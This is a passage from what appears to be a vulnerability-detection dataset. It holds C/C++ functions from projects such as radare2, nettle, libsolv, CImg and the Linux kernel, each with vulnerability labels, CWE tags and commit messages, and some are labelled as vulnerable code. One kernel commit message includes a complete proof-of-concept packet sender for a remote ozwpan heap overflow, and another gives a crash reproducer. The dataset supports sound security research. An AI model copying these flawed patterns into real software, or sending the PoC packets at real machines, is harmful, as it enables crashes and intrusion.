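 * multiplication would overflow size_t instead of silently wrapping. */
void *alloc2_checked(size_t num, size_t size)
{
    if (size != 0 && num > SIZE_MAX / size) {
        return NULL;            /* product would overflow: refuse to allocate */
    }
    return malloc(num * size);
}

int main(void)
{
    /* A hostile header could request an element count whose product with the
     * element size wraps around; the checked call refuses instead. */
    void *p = alloc2_checked(SIZE_MAX / 2, 4);
    printf("checked allocation %s\n", p ? "succeeded" : "refused/failed");
    free(p);
    return 0;
}
```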
CImgDisplay::_fitscreen(dx,dy,dz,128,-85,true) static unsigned int _fitscreen(const unsigned int dx, const unsigned int dy, const unsigned int dz, const int dmin, const int dmax, const bool return_y) { const int u = CImgDisplay::screen_width(), v = CImgDisplay::screen_height(); const float mw = dmin<0?cimg::round(u*-dmin/100.f):(float)dmin, mh = dmin<0?cimg::round(v*-dmin/100.f):(float)dmin, Mw = dmax<0?cimg::round(u*-dmax/100.f):(float)dmax, Mh = dmax<0?cimg::round(v*-dmax/100.f):(float)dmax; float w = (float)std::max(1U,dx), h = (float)std::max(1U,dy); if (dz>1) { w+=dz; h+=dz; } if (w<mw) { h = h*mw/w; w = mw; } if (h<mh) { w = w*mh/h; h = mh; } if (w>Mw) { h = h*Mw/w; w = Mw; } if (h>Mh) { w = w*Mh/h; h = Mh; } if (w<mw) w = mw; if (h<mh) h = mh; return std::max(1U,(unsigned int)cimg::round(return_y?h:w));
0
[ "CWE-119", "CWE-787" ]
CImg
ac8003393569aba51048c9d67e1491559877b1d1
126,744,168,633,946,730,000,000,000,000,000,000,000
22
.
OsVendorInit(void) { static Bool beenHere = FALSE; signal(SIGCHLD, SIG_DFL); /* Need to wait for child processes */ if (!beenHere) { umask(022); xf86LogInit(); } /* Set stderr to non-blocking. */ #ifndef O_NONBLOCK #if defined(FNDELAY) #define O_NONBLOCK FNDELAY #elif defined(O_NDELAY) #define O_NONBLOCK O_NDELAY #endif #ifdef O_NONBLOCK if (!beenHere) { if (xf86PrivsElevated()) { int status; status = fcntl(fileno(stderr), F_GETFL, 0); if (status != -1) { fcntl(fileno(stderr), F_SETFL, status | O_NONBLOCK); } } } #endif #endif beenHere = TRUE; }
0
[]
xserver
032b1d79b7d04d47814a5b3a9fdd162249fea74c
135,089,262,103,994,470,000,000,000,000,000,000,000
35
xfree86: use the xf86CheckPrivs() helper for modulepath/logfile v2: Rebase against updated xf86CheckPrivs() helper. Reviewed-by: Adam Jackson <[email protected]> Signed-off-by: Emil Velikov <[email protected]>
repodata_set_str(Repodata *data, Id solvid, Id keyname, const char *str) { Repokey key; int l; l = strlen(str) + 1; key.name = keyname; key.type = REPOKEY_TYPE_STR; key.size = 0; key.storage = KEY_STORAGE_INCORE; data->attrdata = solv_extend(data->attrdata, data->attrdatalen, l, 1, REPODATA_ATTRDATA_BLOCK); memcpy(data->attrdata + data->attrdatalen, str, l); repodata_set(data, solvid, &key, data->attrdatalen); data->attrdatalen += l; }
0
[ "CWE-125" ]
libsolv
fdb9c9c03508990e4583046b590c30d958f272da
253,803,141,486,854,700,000,000,000,000,000,000,000
15
repodata_schema2id: fix heap-buffer-overflow in memcmp When the length of last schema in data->schemadata is less than length of input schema, we got a read overflow in asan test. Signed-off-by: Zhipeng Xie <[email protected]>
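Editor's note: the libsolv message explains that the overflow came from memcmp-ing an input schema against a stored schema that could be shorter than the input. The general defensive pattern, comparing lengths before memcmp, can be sketched as below; the names are placeholders and this is not the repodata_schema2id code.

```c
#include <string.h>

/* Illustrative only: compare a candidate record against a stored buffer,
 * checking the remaining stored length first so memcmp never reads past
 * the end of the stored data. */
int record_matches(const unsigned char *stored, size_t stored_len,
                   const unsigned char *needle, size_t needle_len)
{
    if (stored_len < needle_len)
        return 0;   /* too short: cannot match, and must not be memcmp'd */
    return memcmp(stored, needle, needle_len) == 0;
}
```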
static CImg<floatT> box3d(CImgList<tf>& primitives, const float size_x=200, const float size_y=100, const float size_z=100) { primitives.assign(6,1,4,1,1, 0,3,2,1, 4,5,6,7, 0,1,5,4, 3,7,6,2, 0,4,7,3, 1,2,6,5); return CImg<floatT>(8,3,1,1, 0.,size_x,size_x, 0., 0.,size_x,size_x, 0., 0., 0.,size_y,size_y, 0., 0.,size_y,size_y, 0., 0., 0., 0.,size_z,size_z,size_z,size_z); }
0
[ "CWE-770" ]
cimg
619cb58dd90b4e03ac68286c70ed98acbefd1c90
308,365,003,376,796,940,000,000,000,000,000,000,000
8
CImg<>::load_bmp() and CImg<>::load_pandore(): Check that dimensions encoded in file does not exceed file size.
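Editor's note: the CImg message above is about validating header-declared dimensions against the real file size before trusting them. A hedged, generic sketch of such a check, with invented names and not CImg's own code, might be:

```c
#include <stdint.h>

/* Illustrative only: sanity-check image dimensions read from a file header
 * against the actual file size before allocating or reading pixel data,
 * using 64-bit math so the product itself cannot overflow the check. */
int dims_plausible(uint32_t width, uint32_t height,
                   uint32_t bytes_per_pixel, uint64_t file_size)
{
    uint64_t need = (uint64_t)width * height;
    if (bytes_per_pixel && need > UINT64_MAX / bytes_per_pixel)
        return 0;               /* total pixel bytes would overflow */
    need *= bytes_per_pixel;
    return need <= file_size;
}
```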
static Var* Pe_r_bin_pe_parse_var(RBinPEObj* pe, PE_DWord* curAddr) { Var* var = calloc (1, sizeof (*var)); if (!var) { pe_printf ("Warning: calloc (Var)\n"); return NULL; } if ((var->wLength = r_buf_read_le16_at (pe->b, *curAddr)) == UT16_MAX) { pe_printf ("Warning: read (Var wLength)\n"); free_Var (var); return NULL; } *curAddr += sizeof (var->wLength); if ((var->wValueLength = r_buf_read_le16_at (pe->b, *curAddr)) == UT16_MAX) { pe_printf ("Warning: read (Var wValueLength)\n"); free_Var (var); return NULL; } *curAddr += sizeof (var->wValueLength); if ((var->wType = r_buf_read_le16_at (pe->b, *curAddr)) == UT16_MAX) { pe_printf ("Warning: read (Var wType)\n"); free_Var (var); return NULL; } *curAddr += sizeof (var->wType); if (var->wType != 0 && var->wType != 1) { pe_printf ("Warning: check (Var wType)\n"); free_Var (var); return NULL; } var->szKey = (ut16*) malloc (UT16_ALIGN (TRANSLATION_UTF_16_LEN)); //L"Translation" if (!var->szKey) { pe_printf ("Warning: malloc (Var szKey)\n"); free_Var (var); return NULL; } if (r_buf_read_at (pe->b, *curAddr, (ut8*) var->szKey, TRANSLATION_UTF_16_LEN) < 1) { pe_printf ("Warning: read (Var szKey)\n"); free_Var (var); return NULL; } *curAddr += TRANSLATION_UTF_16_LEN; if (memcmp (var->szKey, TRANSLATION_UTF_16, TRANSLATION_UTF_16_LEN)) { pe_printf ("Warning: check (Var szKey)\n"); free_Var (var); return NULL; } align32 (*curAddr); var->numOfValues = var->wValueLength / 4; if (!var->numOfValues) { pe_printf ("Warning: check (Var numOfValues)\n"); free_Var (var); return NULL; } var->Value = (ut32*) malloc (var->wValueLength); if (!var->Value) { pe_printf ("Warning: malloc (Var Value)\n"); free_Var (var); return NULL; } if (r_buf_read_at (pe->b, *curAddr, (ut8*) var->Value, var->wValueLength) != var->wValueLength) { pe_printf ("Warning: read (Var Value)\n"); free_Var (var); return NULL; } *curAddr += var->wValueLength; return var; }
1
[ "CWE-400", "CWE-703" ]
radare2
634b886e84a5c568d243e744becc6b3223e089cf
237,260,582,706,114,450,000,000,000,000,000,000,000
68
Fix DoS in PE/QNX/DYLDCACHE/PSX parsers ##crash * Reported by lazymio * Reproducer: AAA4AAAAAB4=
void Monitor::handle_signal(int signum) { assert(signum == SIGINT || signum == SIGTERM); derr << "*** Got Signal " << sig_str(signum) << " ***" << dendl; shutdown(); }
0
[ "CWE-287", "CWE-284" ]
ceph
5ead97120e07054d80623dada90a5cc764c28468
304,941,564,105,649,560,000,000,000,000,000,000,000
6
auth/cephx: add authorizer challenge Allow the accepting side of a connection to reject an initial authorizer with a random challenge. The connecting side then has to respond with an updated authorizer proving they are able to decrypt the service's challenge and that the new authorizer was produced for this specific connection instance. The accepting side requires this challenge and response unconditionally if the client side advertises they have the feature bit. Servers wishing to require this improved level of authentication simply have to require the appropriate feature. Signed-off-by: Sage Weil <[email protected]> (cherry picked from commit f80b848d3f830eb6dba50123e04385173fa4540b) # Conflicts: # src/auth/Auth.h # src/auth/cephx/CephxProtocol.cc # src/auth/cephx/CephxProtocol.h # src/auth/none/AuthNoneProtocol.h # src/msg/Dispatcher.h # src/msg/async/AsyncConnection.cc - const_iterator - ::decode vs decode - AsyncConnection ctor arg noise - get_random_bytes(), not cct->random()
int match_re(my_regex_t *re, char *str) { while (my_isspace(charset_info, *str)) str++; if (str[0] == '/' && str[1] == '*') { char *comm_end= strstr (str, "*/"); if (! comm_end) die("Statement is unterminated comment"); str= comm_end + 2; } int err= my_regexec(re, str, (size_t)0, NULL, 0); if (err == 0) return 1; else if (err == REG_NOMATCH) return 0; { char erbuf[100]; int len= my_regerror(err, re, erbuf, sizeof(erbuf)); die("error %s, %d/%d `%s'\n", re_eprint(err), (int)len, (int)sizeof(erbuf), erbuf); } return 0; }
0
[ "CWE-295" ]
mysql-server
b3e9211e48a3fb586e88b0270a175d2348935424
333,984,851,250,940,700,000,000,000,000,000,000,000
27
WL#9072: Backport WL#8785 to 5.5
void flush_tlb_page(struct vm_area_struct *vma, unsigned long start) { struct mm_struct *mm = vma->vm_mm; preempt_disable(); if (current->active_mm == mm) { if (current->mm) __flush_tlb_one(start); else leave_mm(smp_processor_id()); } if (cpumask_any_but(mm_cpumask(mm), smp_processor_id()) < nr_cpu_ids) flush_tlb_others(mm_cpumask(mm), mm, start, 0UL); preempt_enable(); }
1
[ "CWE-362" ]
linux
71b3c126e61177eb693423f2e18a1914205b165e
48,340,948,654,172,530,000,000,000,000,000,000,000
18
x86/mm: Add barriers and document switch_mm()-vs-flush synchronization When switch_mm() activates a new PGD, it also sets a bit that tells other CPUs that the PGD is in use so that TLB flush IPIs will be sent. In order for that to work correctly, the bit needs to be visible prior to loading the PGD and therefore starting to fill the local TLB. Document all the barriers that make this work correctly and add a couple that were missing. Signed-off-by: Andy Lutomirski <[email protected]> Cc: Andrew Morton <[email protected]> Cc: Andy Lutomirski <[email protected]> Cc: Borislav Petkov <[email protected]> Cc: Brian Gerst <[email protected]> Cc: Dave Hansen <[email protected]> Cc: Denys Vlasenko <[email protected]> Cc: H. Peter Anvin <[email protected]> Cc: Linus Torvalds <[email protected]> Cc: Peter Zijlstra <[email protected]> Cc: Rik van Riel <[email protected]> Cc: Thomas Gleixner <[email protected]> Cc: [email protected] Cc: [email protected] Signed-off-by: Ingo Molnar <[email protected]>
static int oz_hcd_hub_control(struct usb_hcd *hcd, u16 req_type, u16 wvalue, u16 windex, char *buf, u16 wlength) { int err = 0; switch (req_type) { case ClearHubFeature: oz_dbg(HUB, "ClearHubFeature: %d\n", req_type); break; case ClearPortFeature: err = oz_clear_port_feature(hcd, wvalue, windex); break; case GetHubDescriptor: oz_get_hub_descriptor(hcd, (struct usb_hub_descriptor *)buf); break; case GetHubStatus: oz_dbg(HUB, "GetHubStatus: req_type = 0x%x\n", req_type); put_unaligned(cpu_to_le32(0), (__le32 *)buf); break; case GetPortStatus: err = oz_get_port_status(hcd, windex, buf); break; case SetHubFeature: oz_dbg(HUB, "SetHubFeature: %d\n", req_type); break; case SetPortFeature: err = oz_set_port_feature(hcd, wvalue, windex); break; default: oz_dbg(HUB, "Other: %d\n", req_type); break; } return err; }
0
[ "CWE-703", "CWE-189" ]
linux
b1bb5b49373b61bf9d2c73a4d30058ba6f069e4c
80,046,400,601,615,030,000,000,000,000,000,000,000
34
ozwpan: Use unsigned ints to prevent heap overflow Using signed integers, the subtraction between required_size and offset could wind up being negative, resulting in a memcpy into a heap buffer with a negative length, resulting in huge amounts of network-supplied data being copied into the heap, which could potentially lead to remote code execution.. This is remotely triggerable with a magic packet. A PoC which obtains DoS follows below. It requires the ozprotocol.h file from this module. =-=-=-=-=-= #include <arpa/inet.h> #include <linux/if_packet.h> #include <net/if.h> #include <netinet/ether.h> #include <stdio.h> #include <string.h> #include <stdlib.h> #include <endian.h> #include <sys/ioctl.h> #include <sys/socket.h> #define u8 uint8_t #define u16 uint16_t #define u32 uint32_t #define __packed __attribute__((__packed__)) #include "ozprotocol.h" static int hex2num(char c) { if (c >= '0' && c <= '9') return c - '0'; if (c >= 'a' && c <= 'f') return c - 'a' + 10; if (c >= 'A' && c <= 'F') return c - 'A' + 10; return -1; } static int hwaddr_aton(const char *txt, uint8_t *addr) { int i; for (i = 0; i < 6; i++) { int a, b; a = hex2num(*txt++); if (a < 0) return -1; b = hex2num(*txt++); if (b < 0) return -1; *addr++ = (a << 4) | b; if (i < 5 && *txt++ != ':') return -1; } return 0; } int main(int argc, char *argv[]) { if (argc < 3) { fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]); return 1; } uint8_t dest_mac[6]; if (hwaddr_aton(argv[2], dest_mac)) { fprintf(stderr, "Invalid mac address.\n"); return 1; } int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW); if (sockfd < 0) { perror("socket"); return 1; } struct ifreq if_idx; int interface_index; strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1); if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) { perror("SIOCGIFINDEX"); return 1; } interface_index = if_idx.ifr_ifindex; if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) { perror("SIOCGIFHWADDR"); return 1; } uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data; struct { struct ether_header ether_header; struct oz_hdr oz_hdr; struct oz_elt oz_elt; struct oz_elt_connect_req oz_elt_connect_req; } __packed connect_packet = { .ether_header = { .ether_type = htons(OZ_ETHERTYPE), .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }, .oz_hdr = { .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT), .last_pkt_num = 0, .pkt_num = htole32(0) }, .oz_elt = { .type = OZ_ELT_CONNECT_REQ, .length = sizeof(struct oz_elt_connect_req) }, .oz_elt_connect_req = { .mode = 0, .resv1 = {0}, .pd_info = 0, .session_id = 0, .presleep = 35, .ms_isoc_latency = 0, .host_vendor = 0, .keep_alive = 0, .apps = htole16((1 << OZ_APPID_USB) | 0x1), .max_len_div16 = 0, .ms_per_isoc = 0, .up_audio_buf = 0, .ms_per_elt = 0 } }; struct { struct ether_header ether_header; struct oz_hdr oz_hdr; struct oz_elt oz_elt; struct oz_get_desc_rsp oz_get_desc_rsp; } __packed pwn_packet = { .ether_header = { .ether_type = htons(OZ_ETHERTYPE), .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }, .oz_hdr = { .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT), .last_pkt_num = 0, .pkt_num = htole32(1) }, .oz_elt = { .type = OZ_ELT_APP_DATA, .length = sizeof(struct oz_get_desc_rsp) }, .oz_get_desc_rsp = { .app_id = 
OZ_APPID_USB, .elt_seq_num = 0, .type = OZ_GET_DESC_RSP, .req_id = 0, .offset = htole16(2), .total_size = htole16(1), .rcode = 0, .data = {0} } }; struct sockaddr_ll socket_address = { .sll_ifindex = interface_index, .sll_halen = ETH_ALEN, .sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }; if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) { perror("sendto"); return 1; } usleep(300000); if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) { perror("sendto"); return 1; } return 0; } Signed-off-by: Jason A. Donenfeld <[email protected]> Acked-by: Dan Carpenter <[email protected]> Cc: stable <[email protected]> Signed-off-by: Greg Kroah-Hartman <[email protected]>
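Editor's note: the ozwpan write-up above shows how a signed subtraction between two attacker-influenced length fields can go negative and then be reinterpreted as a huge unsigned memcpy length. As an illustration of the underlying defensive pattern only (this is not the ozwpan driver code; the function and parameter names are made up), the lengths can be validated as unsigned values before any subtraction:

```c
#include <string.h>
#include <stdint.h>

/* Illustrative only: when length and offset fields come from the network,
 * validate them as unsigned values before subtracting, so a bogus offset can
 * never produce a negative, and therefore enormous, copy length. */
int copy_fragment(uint8_t *dst, size_t dst_size,
                  const uint8_t *src, size_t total_size, size_t offset)
{
    if (offset > total_size || total_size - offset > dst_size)
        return -1;              /* reject instead of wrapping around */
    memcpy(dst, src + offset, total_size - offset);
    return 0;
}
```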
__blk_mq_alloc_request(struct blk_mq_alloc_data *data, int rw) { struct request *rq; unsigned int tag; tag = blk_mq_get_tag(data); if (tag != BLK_MQ_TAG_FAIL) { rq = data->hctx->tags->rqs[tag]; if (blk_mq_tag_busy(data->hctx)) { rq->cmd_flags = REQ_MQ_INFLIGHT; atomic_inc(&data->hctx->nr_active); } rq->tag = tag; blk_mq_rq_ctx_init(data->q, data->ctx, rq, rw); return rq; } return NULL; }
0
[ "CWE-362", "CWE-264" ]
linux
0048b4837affd153897ed1222283492070027aa9
10,725,653,674,652,838,000,000,000,000,000,000,000
21
blk-mq: fix race between timeout and freeing request Inside timeout handler, blk_mq_tag_to_rq() is called to retrieve the request from one tag. This way is obviously wrong because the request can be freed any time and some fiedds of the request can't be trusted, then kernel oops might be triggered[1]. Currently wrt. blk_mq_tag_to_rq(), the only special case is that the flush request can share same tag with the request cloned from, and the two requests can't be active at the same time, so this patch fixes the above issue by updating tags->rqs[tag] with the active request(either flush rq or the request cloned from) of the tag. Also blk_mq_tag_to_rq() gets much simplified with this patch. Given blk_mq_tag_to_rq() is mainly for drivers and the caller must make sure the request can't be freed, so in bt_for_each() this helper is replaced with tags->rqs[tag]. [1] kernel oops log [ 439.696220] BUG: unable to handle kernel NULL pointer dereference at 0000000000000158^M [ 439.697162] IP: [<ffffffff812d89ba>] blk_mq_tag_to_rq+0x21/0x6e^M [ 439.700653] PGD 7ef765067 PUD 7ef764067 PMD 0 ^M [ 439.700653] Oops: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC ^M [ 439.700653] Dumping ftrace buffer:^M [ 439.700653] (ftrace buffer empty)^M [ 439.700653] Modules linked in: nbd ipv6 kvm_intel kvm serio_raw^M [ 439.700653] CPU: 6 PID: 2779 Comm: stress-ng-sigfd Not tainted 4.2.0-rc5-next-20150805+ #265^M [ 439.730500] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011^M [ 439.730500] task: ffff880605308000 ti: ffff88060530c000 task.ti: ffff88060530c000^M [ 439.730500] RIP: 0010:[<ffffffff812d89ba>] [<ffffffff812d89ba>] blk_mq_tag_to_rq+0x21/0x6e^M [ 439.730500] RSP: 0018:ffff880819203da0 EFLAGS: 00010283^M [ 439.730500] RAX: ffff880811b0e000 RBX: ffff8800bb465f00 RCX: 0000000000000002^M [ 439.730500] RDX: 0000000000000000 RSI: 0000000000000202 RDI: 0000000000000000^M [ 439.730500] RBP: ffff880819203db0 R08: 0000000000000002 R09: 0000000000000000^M [ 439.730500] R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000202^M [ 439.730500] R13: ffff880814104800 R14: 0000000000000002 R15: ffff880811a2ea00^M [ 439.730500] FS: 00007f165b3f5740(0000) GS:ffff880819200000(0000) knlGS:0000000000000000^M [ 439.730500] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b^M [ 439.730500] CR2: 0000000000000158 CR3: 00000007ef766000 CR4: 00000000000006e0^M [ 439.730500] Stack:^M [ 439.730500] 0000000000000008 ffff8808114eed90 ffff880819203e00 ffffffff812dc104^M [ 439.755663] ffff880819203e40 ffffffff812d9f5e 0000020000000000 ffff8808114eed80^M [ 439.755663] Call Trace:^M [ 439.755663] <IRQ> ^M [ 439.755663] [<ffffffff812dc104>] bt_for_each+0x6e/0xc8^M [ 439.755663] [<ffffffff812d9f5e>] ? blk_mq_rq_timed_out+0x6a/0x6a^M [ 439.755663] [<ffffffff812d9f5e>] ? blk_mq_rq_timed_out+0x6a/0x6a^M [ 439.755663] [<ffffffff812dc1b3>] blk_mq_tag_busy_iter+0x55/0x5e^M [ 439.755663] [<ffffffff812d88b4>] ? blk_mq_bio_to_request+0x38/0x38^M [ 439.755663] [<ffffffff812d8911>] blk_mq_rq_timer+0x5d/0xd4^M [ 439.755663] [<ffffffff810a3e10>] call_timer_fn+0xf7/0x284^M [ 439.755663] [<ffffffff810a3d1e>] ? call_timer_fn+0x5/0x284^M [ 439.755663] [<ffffffff812d88b4>] ? 
blk_mq_bio_to_request+0x38/0x38^M [ 439.755663] [<ffffffff810a46d6>] run_timer_softirq+0x1ce/0x1f8^M [ 439.755663] [<ffffffff8104c367>] __do_softirq+0x181/0x3a4^M [ 439.755663] [<ffffffff8104c76e>] irq_exit+0x40/0x94^M [ 439.755663] [<ffffffff81031482>] smp_apic_timer_interrupt+0x33/0x3e^M [ 439.755663] [<ffffffff815559a4>] apic_timer_interrupt+0x84/0x90^M [ 439.755663] <EOI> ^M [ 439.755663] [<ffffffff81554350>] ? _raw_spin_unlock_irq+0x32/0x4a^M [ 439.755663] [<ffffffff8106a98b>] finish_task_switch+0xe0/0x163^M [ 439.755663] [<ffffffff8106a94d>] ? finish_task_switch+0xa2/0x163^M [ 439.755663] [<ffffffff81550066>] __schedule+0x469/0x6cd^M [ 439.755663] [<ffffffff8155039b>] schedule+0x82/0x9a^M [ 439.789267] [<ffffffff8119b28b>] signalfd_read+0x186/0x49a^M [ 439.790911] [<ffffffff8106d86a>] ? wake_up_q+0x47/0x47^M [ 439.790911] [<ffffffff811618c2>] __vfs_read+0x28/0x9f^M [ 439.790911] [<ffffffff8117a289>] ? __fget_light+0x4d/0x74^M [ 439.790911] [<ffffffff811620a7>] vfs_read+0x7a/0xc6^M [ 439.790911] [<ffffffff8116292b>] SyS_read+0x49/0x7f^M [ 439.790911] [<ffffffff81554c17>] entry_SYSCALL_64_fastpath+0x12/0x6f^M [ 439.790911] Code: 48 89 e5 e8 a9 b8 e7 ff 5d c3 0f 1f 44 00 00 55 89 f2 48 89 e5 41 54 41 89 f4 53 48 8b 47 60 48 8b 1c d0 48 8b 7b 30 48 8b 53 38 <48> 8b 87 58 01 00 00 48 85 c0 75 09 48 8b 97 88 0c 00 00 eb 10 ^M [ 439.790911] RIP [<ffffffff812d89ba>] blk_mq_tag_to_rq+0x21/0x6e^M [ 439.790911] RSP <ffff880819203da0>^M [ 439.790911] CR2: 0000000000000158^M [ 439.790911] ---[ end trace d40af58949325661 ]---^M Cc: <[email protected]> Signed-off-by: Ming Lei <[email protected]> Signed-off-by: Jens Axboe <[email protected]>
memxor3_different_alignment_ab (word_t *dst, const char *a, const char *b, unsigned offset, size_t n) { int shl, shr; const word_t *a_word; const word_t *b_word; word_t s0, s1; shl = CHAR_BIT * offset; shr = CHAR_BIT * (sizeof(word_t) - offset); a_word = (const word_t *) ((uintptr_t) a & -sizeof(word_t)); b_word = (const word_t *) ((uintptr_t) b & -sizeof(word_t)); if (n & 1) { n--; s1 = a_word[n] ^ b_word[n]; s0 = a_word[n+1] ^ b_word[n+1]; dst[n] = MERGE (s1, shl, s0, shr); } else s1 = a_word[n] ^ b_word[n]; while (n > 0) { n -= 2; s0 = a_word[n+1] ^ b_word[n+1]; dst[n+1] = MERGE(s0, shl, s1, shr); s1 = a_word[n] ^ b_word[n]; dst[n] = MERGE(s1, shl, s0, shr); } }
1
[]
nettle
842abf376289059cd3dce34a851a3f701ad1f9b3
303,478,346,986,540,450,000,000,000,000,000,000,000
35
Fixed out-of-bounds reads in memxor3.
static BROTLI_INLINE BrotliDecoderErrorCode ProcessCommandsInternal( int safe, BrotliDecoderState* s) { int pos = s->pos; int i = s->loop_counter; BrotliDecoderErrorCode result = BROTLI_DECODER_SUCCESS; BrotliBitReader* br = &s->br; if (!CheckInputAmount(safe, br, 28)) { result = BROTLI_DECODER_NEEDS_MORE_INPUT; goto saveStateAndReturn; } if (!safe) { BROTLI_UNUSED(BrotliWarmupBitReader(br)); } /* Jump into state machine. */ if (s->state == BROTLI_STATE_COMMAND_BEGIN) { goto CommandBegin; } else if (s->state == BROTLI_STATE_COMMAND_INNER) { goto CommandInner; } else if (s->state == BROTLI_STATE_COMMAND_POST_DECODE_LITERALS) { goto CommandPostDecodeLiterals; } else if (s->state == BROTLI_STATE_COMMAND_POST_WRAP_COPY) { goto CommandPostWrapCopy; } else { return BROTLI_FAILURE(BROTLI_DECODER_ERROR_UNREACHABLE); } CommandBegin: if (safe) { s->state = BROTLI_STATE_COMMAND_BEGIN; } if (!CheckInputAmount(safe, br, 28)) { /* 156 bits + 7 bytes */ s->state = BROTLI_STATE_COMMAND_BEGIN; result = BROTLI_DECODER_NEEDS_MORE_INPUT; goto saveStateAndReturn; } if (BROTLI_PREDICT_FALSE(s->block_length[1] == 0)) { BROTLI_SAFE(DecodeCommandBlockSwitch(s)); goto CommandBegin; } /* Read the insert/copy length in the command. */ BROTLI_SAFE(ReadCommand(s, br, &i)); BROTLI_LOG(("[ProcessCommandsInternal] pos = %d insert = %d copy = %d\n", pos, i, s->copy_length)); if (i == 0) { goto CommandPostDecodeLiterals; } s->meta_block_remaining_len -= i; CommandInner: if (safe) { s->state = BROTLI_STATE_COMMAND_INNER; } /* Read the literals in the command. */ if (s->trivial_literal_context) { uint32_t bits; uint32_t value; PreloadSymbol(safe, s->literal_htree, br, &bits, &value); do { if (!CheckInputAmount(safe, br, 28)) { /* 162 bits + 7 bytes */ s->state = BROTLI_STATE_COMMAND_INNER; result = BROTLI_DECODER_NEEDS_MORE_INPUT; goto saveStateAndReturn; } if (BROTLI_PREDICT_FALSE(s->block_length[0] == 0)) { BROTLI_SAFE(DecodeLiteralBlockSwitch(s)); PreloadSymbol(safe, s->literal_htree, br, &bits, &value); if (!s->trivial_literal_context) goto CommandInner; } if (!safe) { s->ringbuffer[pos] = (uint8_t)ReadPreloadedSymbol(s->literal_htree, br, &bits, &value); } else { uint32_t literal; if (!SafeReadSymbol(s->literal_htree, br, &literal)) { result = BROTLI_DECODER_NEEDS_MORE_INPUT; goto saveStateAndReturn; } s->ringbuffer[pos] = (uint8_t)literal; } --s->block_length[0]; BROTLI_LOG_ARRAY_INDEX(s->ringbuffer, pos); ++pos; if (BROTLI_PREDICT_FALSE(pos == s->ringbuffer_size)) { s->state = BROTLI_STATE_COMMAND_INNER_WRITE; --i; goto saveStateAndReturn; } } while (--i != 0); } else { uint8_t p1 = s->ringbuffer[(pos - 1) & s->ringbuffer_mask]; uint8_t p2 = s->ringbuffer[(pos - 2) & s->ringbuffer_mask]; do { const HuffmanCode* hc; uint8_t context; if (!CheckInputAmount(safe, br, 28)) { /* 162 bits + 7 bytes */ s->state = BROTLI_STATE_COMMAND_INNER; result = BROTLI_DECODER_NEEDS_MORE_INPUT; goto saveStateAndReturn; } if (BROTLI_PREDICT_FALSE(s->block_length[0] == 0)) { BROTLI_SAFE(DecodeLiteralBlockSwitch(s)); if (s->trivial_literal_context) goto CommandInner; } context = BROTLI_CONTEXT(p1, p2, s->context_lookup); BROTLI_LOG_UINT(context); hc = s->literal_hgroup.htrees[s->context_map_slice[context]]; p2 = p1; if (!safe) { p1 = (uint8_t)ReadSymbol(hc, br); } else { uint32_t literal; if (!SafeReadSymbol(hc, br, &literal)) { result = BROTLI_DECODER_NEEDS_MORE_INPUT; goto saveStateAndReturn; } p1 = (uint8_t)literal; } s->ringbuffer[pos] = p1; --s->block_length[0]; BROTLI_LOG_UINT(s->context_map_slice[context]); 
BROTLI_LOG_ARRAY_INDEX(s->ringbuffer, pos & s->ringbuffer_mask); ++pos; if (BROTLI_PREDICT_FALSE(pos == s->ringbuffer_size)) { s->state = BROTLI_STATE_COMMAND_INNER_WRITE; --i; goto saveStateAndReturn; } } while (--i != 0); } BROTLI_LOG_UINT(s->meta_block_remaining_len); if (BROTLI_PREDICT_FALSE(s->meta_block_remaining_len <= 0)) { s->state = BROTLI_STATE_METABLOCK_DONE; goto saveStateAndReturn; } CommandPostDecodeLiterals: if (safe) { s->state = BROTLI_STATE_COMMAND_POST_DECODE_LITERALS; } if (s->distance_code >= 0) { /* Implicit distance case. */ s->distance_context = s->distance_code ? 0 : 1; --s->dist_rb_idx; s->distance_code = s->dist_rb[s->dist_rb_idx & 3]; } else { /* Read distance code in the command, unless it was implicitly zero. */ if (BROTLI_PREDICT_FALSE(s->block_length[2] == 0)) { BROTLI_SAFE(DecodeDistanceBlockSwitch(s)); } BROTLI_SAFE(ReadDistance(s, br)); } BROTLI_LOG(("[ProcessCommandsInternal] pos = %d distance = %d\n", pos, s->distance_code)); if (s->max_distance != s->max_backward_distance) { s->max_distance = (pos < s->max_backward_distance) ? pos : s->max_backward_distance; } i = s->copy_length; /* Apply copy of LZ77 back-reference, or static dictionary reference if the distance is larger than the max LZ77 distance */ if (s->distance_code > s->max_distance) { /* The maximum allowed distance is BROTLI_MAX_ALLOWED_DISTANCE = 0x7FFFFFFC. With this choice, no signed overflow can occur after decoding a special distance code (e.g., after adding 3 to the last distance). */ if (s->distance_code > BROTLI_MAX_ALLOWED_DISTANCE) { BROTLI_LOG(("Invalid backward reference. pos: %d distance: %d " "len: %d bytes left: %d\n", pos, s->distance_code, i, s->meta_block_remaining_len)); return BROTLI_FAILURE(BROTLI_DECODER_ERROR_FORMAT_DISTANCE); } if (i >= BROTLI_MIN_DICTIONARY_WORD_LENGTH && i <= 